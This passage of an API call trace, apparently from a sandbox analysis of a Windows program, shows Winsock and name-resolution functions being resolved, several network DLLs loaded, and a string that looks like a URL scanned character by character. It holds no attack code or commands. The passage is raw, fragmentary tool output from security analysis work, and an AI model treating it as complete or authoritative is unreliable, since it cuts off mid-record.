lpMultiByteStr=0x247a9ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10 [0101.667] GetProcAddress (hModule=0x754f0000, lpProcName="WSAStartup") returned 0x754f5b40 [0101.667] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fabe | out: lpWSAData=0x19fabe) returned 0 [0101.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoW", cchWideChar=12, lpMultiByteStr=0x247a9ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoW", lpUsedDefaultChar=0x0) returned 12 [0101.671] GetProcAddress (hModule=0x754f0000, lpProcName="GetAddrInfoW") returned 0x754f7d70 [0101.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.671] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetNameInfoW", cchWideChar=12, lpMultiByteStr=0x247a9ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNameInfoW", lpUsedDefaultChar=0x0) returned 12 [0101.672] GetProcAddress (hModule=0x754f0000, lpProcName="GetNameInfoW") returned 0x75507a60 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoW", cchWideChar=13, lpMultiByteStr=0x247a9ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoW", lpUsedDefaultChar=0x0) returned 13 [0101.672] GetProcAddress (hModule=0x754f0000, lpProcName="FreeAddrInfoW") returned 0x754f4fa0 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetPtonW", cchWideChar=9, lpMultiByteStr=0x247a9ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetPtonW", lpUsedDefaultChar=0x0) returned 9 [0101.672] GetProcAddress (hModule=0x754f0000, lpProcName="InetPtonW") returned 0x75521c10 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InetNtopW", cchWideChar=9, lpMultiByteStr=0x247a9ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InetNtopW", lpUsedDefaultChar=0x0) returned 9 [0101.672] GetProcAddress (hModule=0x754f0000, lpProcName="InetNtopW") returned 0x75509c30 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x247a9ac, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0101.673] GetProcAddress (hModule=0x754f0000, lpProcName="GetAddrInfoExW") returned 0x75501f90 [0101.673] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.673] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetAddrInfoExW", cchWideChar=14, lpMultiByteStr=0x247a9ac, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetAddrInfoExW", lpUsedDefaultChar=0x0) returned 14 [0101.673] GetProcAddress (hModule=0x754f0000, lpProcName="SetAddrInfoExW") returned 0x7550a1c0 [0101.673] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.673] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FreeAddrInfoExW", cchWideChar=15, lpMultiByteStr=0x247a9ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FreeAddrInfoExW", lpUsedDefaultChar=0x0) returned 15 [0101.673] GetProcAddress (hModule=0x754f0000, lpProcName="FreeAddrInfoExW") returned 0x75508f00 [0101.673] SetErrorMode (uMode=0x8000) returned 0x0 [0101.673] LoadLibraryW (lpLibFileName="Fwpuclnt.dll") returned 0x6f410000 [0101.841] SetErrorMode (uMode=0x0) returned 0x8000 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketSecurity", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketSecurity", cchWideChar=20, lpMultiByteStr=0x24983d4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSASetSocketSecurity", lpUsedDefaultChar=0x0) returned 20 [0101.841] GetProcAddress (hModule=0x6f410000, lpProcName="WSASetSocketSecurity") returned 0x6f433480 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAQuerySocketSecurity", cchWideChar=22, lpMultiByteStr=0x24983d4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAQuerySocketSecurity", lpUsedDefaultChar=0x0) returned 22 [0101.841] GetProcAddress (hModule=0x6f410000, lpProcName="WSAQuerySocketSecurity") returned 0x6f4333c0 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.841] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSASetSocketPeerTargetName", cchWideChar=26, lpMultiByteStr=0x249f66c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSASetSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 26 [0101.842] GetProcAddress (hModule=0x6f410000, lpProcName="WSASetSocketPeerTargetName") returned 0x6f433440 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSADeleteSocketPeerTargetName", cchWideChar=29, lpMultiByteStr=0x249f66c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSADeleteSocketPeerTargetName", lpUsedDefaultChar=0x0) returned 29 [0101.842] GetProcAddress (hModule=0x6f410000, lpProcName="WSADeleteSocketPeerTargetName") returned 0x6f433200 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAImpersonateSocketPeer", cchWideChar=24, lpMultiByteStr=0x249f66c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAImpersonateSocketPeer", lpUsedDefaultChar=0x0) returned 24 [0101.842] GetProcAddress (hModule=0x6f410000, lpProcName="WSAImpersonateSocketPeer") returned 0x6f433240 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSARevertImpersonation", cchWideChar=22, lpMultiByteStr=0x24983d4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSARevertImpersonation", lpUsedDefaultChar=0x0) returned 22 [0101.842] GetProcAddress (hModule=0x6f410000, lpProcName="WSARevertImpersonation") returned 0x6f433410 [0101.842] SetErrorMode (uMode=0x8000) returned 0x0 [0101.842] LoadLibraryW (lpLibFileName="IdnDL.dll") returned 0x6e5c0000 [0101.857] SetErrorMode (uMode=0x0) returned 0x8000 [0101.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetLocaleScripts", cchWideChar=25, lpMultiByteStr=0x249f66c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetLocaleScripts", lpUsedDefaultChar=0x0) returned 25 [0101.857] GetProcAddress (hModule=0x6e5c0000, lpProcName="DownlevelGetLocaleScripts") returned 0x6e5c1330 [0101.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelGetStringScripts", cchWideChar=25, lpMultiByteStr=0x249f66c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelGetStringScripts", lpUsedDefaultChar=0x0) returned 25 [0101.858] GetProcAddress (hModule=0x6e5c0000, lpProcName="DownlevelGetStringScripts") returned 0x74cfaa40 [0101.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DownlevelVerifyScripts", cchWideChar=22, lpMultiByteStr=0x24983d4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DownlevelVerifyScripts", lpUsedDefaultChar=0x0) returned 22 [0101.858] GetProcAddress (hModule=0x6e5c0000, lpProcName="DownlevelVerifyScripts") returned 0x74cfae70 [0101.858] SetErrorMode (uMode=0x8000) returned 0x0 [0101.858] LoadLibraryW (lpLibFileName="Normaliz.dll") returned 0x77900000 [0101.864] SetErrorMode (uMode=0x0) returned 0x8000 [0101.864] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.864] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToUnicode", cchWideChar=12, lpMultiByteStr=0x247a9ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToUnicode", lpUsedDefaultChar=0x0) returned 12 [0101.865] GetProcAddress (hModule=0x77900000, lpProcName="IdnToUnicode") returned 0x74c96ba0 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToNameprepUnicode", cchWideChar=20, lpMultiByteStr=0x24983d4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToNameprepUnicode", lpUsedDefaultChar=0x0) returned 20 [0101.865] GetProcAddress (hModule=0x77900000, lpProcName="IdnToNameprepUnicode") returned 0x74cfad30 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IdnToAscii", cchWideChar=10, lpMultiByteStr=0x247a9ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IdnToAscii", lpUsedDefaultChar=0x0) returned 10 [0101.865] GetProcAddress (hModule=0x77900000, lpProcName="IdnToAscii") returned 0x74cb7a90 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsNormalizedString", cchWideChar=18, lpMultiByteStr=0x24983d4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsNormalizedString", lpUsedDefaultChar=0x0) returned 18 [0101.865] GetProcAddress (hModule=0x77900000, lpProcName="IsNormalizedString") returned 0x74cfad90 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.865] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="NormalizeString", cchWideChar=15, lpMultiByteStr=0x247a9ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NormalizeString", lpUsedDefaultChar=0x0) returned 15 [0101.865] GetProcAddress (hModule=0x77900000, lpProcName="NormalizeString") returned 0x74cfadf0 [0101.865] SetErrorMode (uMode=0x8000) returned 0x0 [0101.865] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x6f540000 [0101.868] SetErrorMode (uMode=0x0) returned 0x8000 [0101.870] GetCurrentThreadId () returned 0x1358 [0101.870] GetCurrentThreadId () returned 0x1358 [0101.870] GetCurrentThreadId () returned 0x1358 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="=", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0101.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 